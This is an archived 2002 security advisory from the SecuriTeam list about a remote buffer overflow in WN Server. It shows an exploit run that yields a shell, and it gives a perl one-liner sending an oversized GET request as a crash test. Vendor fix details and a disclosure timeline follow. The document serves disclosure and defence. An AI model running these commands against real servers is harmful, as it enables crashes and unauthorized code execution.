[UNIX] Buffer Overflow in WN Server

From: support@securiteam.com
Date: 10/01/02


From: support@securiteam.com
To: list@securiteam.com
Date: Tue,  1 Oct 2002 21:45:25 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Buffer Overflow in WN Server
------------------------------------------------------------------------

SUMMARY

Versions 1.18.2 through 2.0.0 of John Franks' WN Server application are
susceptible to remote exploitation of a buffer overflow that an attacker
could cause arbitrary code execution under the privileges of the targeted
server. Exploitation is possible by issuing WN Server a long GET request.
In order to successfully exploit this vulnerability, customized shell code
is required to bypass the character filtering that WN Server imposes on
the requested URI.

"WN is a Web server which runs on a wide variety of UNIX platforms and is
freely available at no cost for any use under the terms of the GNU General
Public License." It is included in the latest FreeBSD ports collection as
well.

DETAILS

Vulnerable systems:
 * WN Server version 1.18.2
 * WN Server version 2.0.0

Immune systems:
 * WN Server version 2.4.4

Analysis:
The following is a snapshot of an exploit at work:

$ (./wn_bof 0 3; cat) | nc target 80
Trying ret=0xbfbeb4ec
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ uname
FreeBSD

Exploitation of a buffer overflow usually results in one of two things:
the targeted host process/application/host crashes, or arbitrary code
executes. Both have serious repercussions, but in most cases code
execution is more threatening in that it could allow for the further
usurpation of higher-level privileges on the targeted host.

Detection:
wn-1.18.2 - wn-2.0.0, which is included in the current version of the
FreeBSD Project's FreeBSD ports collection, is vulnerable. Take the
following steps to determine whether a specific WN implementation is
susceptible:

1. Ensure that WN is running and open two terminals.
2. In the first terminal execute:
    $ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80
3. In the second terminal, determine the process ID of the child that was
spawned to handle the previous command, and attach GDB to it:
    # ps ax | grep swn
      4223 ?? Ss 0:00.29 ./swn
      4711 ?? S 0:00.01 ./swn
    # gdb ./swn 4711
      GNU gdb 4.18
      Copyright 1998 Free Software Foundation, Inc.
      ...
4. In the second terminal, type 'c' telling GDB to continue.
5. In the first terminal, press enter. If at this point the following
output is returned from GDB, then a vulnerable WN implementation is
running:
    Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ??
()

Vendor response:
WN Server 2.4.4 is available at
<http://hopf.math.nwu.edu/wn-2.4.4.tar.gz>
http://hopf.math.nwu.edu/wn-2.4.4.tar.gz. Users should strongly consider
deploying the latest version.

Disclosure timeline:
8/29/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to vendor John Franks (john@math.northwestern.edu)
9/24/2002 Dislcosed to iDEFNESE Clients
9/25/2002 Vendor Response
9/30/2002 Public Disclosure

ADDITIONAL INFORMATION

The information has been provided to iDEFENSE by
<mailto:badc0ded@badc0ded.com> badc0ded.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [Full-disclosure] Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
    ... Mod_proxy implements a proxy/cache for Apache. ... -> simple check what server received ... Vulnerability exists only in 64 bits architectures when server directly convert 'long' type to 'int'. ...
    (Full-Disclosure)
  • [Full-disclosure] Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
    ... Mod_proxy implements a proxy/cache for Apache. ... -> simple check what server received ... Vulnerability exists only in 64 bits architectures when server directly convert 'long' type to 'int'. ...
    (Full-Disclosure)
  • Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
    ... proxy modules for these and other protocols. ... -> simple check what server received ... Vulnerability exists only in 64 bits architectures when server directly convert 'long' type to 'int'. ...
    (Bugtraq)
  • Re: 90 Day Trial
    ... you must have a Terminal Services Licensing Server ... installed and activated, and install TS CALs on it for all of your ... > When I start the terminals, they only will log in as ...
    (microsoft.public.win2000.termserv.clients)
  • Re: fgets() equivalent?
    ... TELNET and all telecommunication programs in the annals of computers is both RAW and COOKED. ... In raw mode with echo enabled, if I press A then B then C then enter, I ... We write online and automated hosting server and clients side applications that has dealt with this issues for the past 25+ years and deal with customers across the board. ... Not all early terminals offer command line because that assume some level of intelligence with having a BUFFER to hold the characters. ...
    (microsoft.public.win32.programmer.kernel)